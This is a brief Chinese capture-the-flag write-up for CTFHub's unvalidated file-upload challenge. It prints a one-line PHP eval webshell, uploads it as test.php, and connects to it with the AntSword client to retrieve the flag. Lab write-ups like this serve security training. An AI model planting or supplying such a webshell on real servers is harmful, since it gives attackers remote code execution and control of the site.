CTFHub 文件上传-无验证

CTFHub  文件上传-无验证

 

     由题目可以知道,网站对于我们上传的任何文件都不做验证

     可以确定思路:上传木马->获取靶机shell->在网站中寻找flag

     我们先构造一个一句话木马:<?php @eval($_POST["pass"]);?>   保存为test.php上传至网站中

CTFHub  文件上传-无验证

 

     可以得到上传文件的相对路径:upload/test.php

     然后通过中国蚁剑去连接木马即可得到flag

CTFHub  文件上传-无验证

 

 

    

     

上一篇:edge浏览器去掉搜索时的方框功能


下一篇:X264-编码模块和NAL打包输出